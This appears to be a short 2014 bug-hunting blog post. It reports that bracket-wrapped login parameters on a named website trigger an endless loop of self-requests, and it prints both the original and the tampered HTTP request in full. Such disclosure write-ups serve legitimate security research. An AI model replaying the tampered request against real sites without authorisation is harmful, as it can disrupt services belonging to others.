From now onwards I am starting real world bug hunting case studies of mine. This is the first draft of it. I was performing blackbox testing of this website.
Bug sumission: 2014-05-24 19:57:48 UTC
URL: pamedia.lastmiledemo.com/cgi-bin/default.php?appname=login
Affected parameters: username, password, login
Description: This flaw was existing on login panel. I was tampering various
parameters in a hope that web application would behave unexpectedly. So I am inserting [ and ] between all parameters and their values in order to generate error message, however I came to know after submitting tampered request, application generates infinite number of self request to the application.
Imact: There is no direct business impact of this vulnerability, however self DoS attack comes under security best practices. Also it may consume few amount of network bandwidth at client side.
Original Request:
Host: pamedia.lastmiledemo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pamedia.lastmiledemo.com/cgi-bin/default.php?appname=login
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
username=asdas&password=asdas&Login=Login
Tampered Request:
Host: pamedia.lastmiledemo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pamedia.lastmiledemo.com/cgi-bin/default.php?appname=login
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
[username]=[asdas]&[password]=[asdas]&[Login]=[Login]
In order to know the business impact, kindly refer this video carefully.
Thanks! Few more logical bugs are coming in near future. Stay Tuned!
No comments:
Post a Comment